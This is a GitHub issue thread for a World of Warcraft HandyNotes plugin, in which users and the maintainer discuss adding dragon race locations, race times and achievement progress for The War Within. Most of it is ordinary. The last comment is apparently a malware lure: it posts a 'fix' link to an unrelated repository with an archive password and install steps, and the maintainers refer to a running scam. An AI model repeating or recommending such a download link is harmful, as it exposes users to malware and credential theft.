### ISSUE TITLE
Dragon races in TWW

### ISSUE THREAD

**Issue by nike1v** [zarillion/handynotes-plugins#443]
**ADDON VERSION**:49

**Describe the bug**
Dragon races does not displayed in the TWW locations, hence they're not added to the addon.
How can I contribute to the TWW addon to be able to see the results and icons for the dragon races? 
Should it be a separate races file for the tww addon, or new locations added to the DF addon, or maybe you planned to separate the dragon races to a separate plugin?
I would like to see them sooner then later, thanks!

**Comment by nike1v** [comment]
Not sure what was the scam is happening here, but ok.

**Comment by zarillion** [comment]
It started around the time TWW launched and is getting annoying for sure.

**Comment by nike1v** [comment]
Just wanted to add, have you added all races manually (ids, nodes, achievements)or you have some kind of tool to do that?

**Comment by zarillion** [comment]
I added this reply to another user on CurseForge:

> At minimum I could see us attaching the completed achievement credit info to the tooltips for the Blizzard race location icons.
> The race times can be a chore to gather and keep updated so we may not include that this time around.

Collecting the race times is a tedious manual process and the race times change over time as Blizzard tunes the races. This expansion we're thinking of making two changes now that Blizzard provides their own icons for the race locations:

1. Use Blizzard's icons and instead just attach information to those existing tooltips
2. Add just the achievement credit information to that tooltip to show your race progress at that location (bronze, silver, gold) for each difficulty.

We're looking at the code to attach to the Blizzard vignette icons, so I would stay tuned for an update soon.

**Comment by nike1v** [comment]
Ok, I see, thanks for a response, if i can help somehow, let me know then!

**Comment by nike1v** [comment]
I actually did liked your custom icons for the races, because it was customizable via the addon (size, opacity), so I can change them at any time, not just toggle like Blizzard's.

**Comment by zarillion** [comment]
Thats good to know! Maybe we go this route, try it out and come to the same conclusion. Once we have the tooltip data it would be easy to swap back to our own icons if we don't like how it turns out.

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
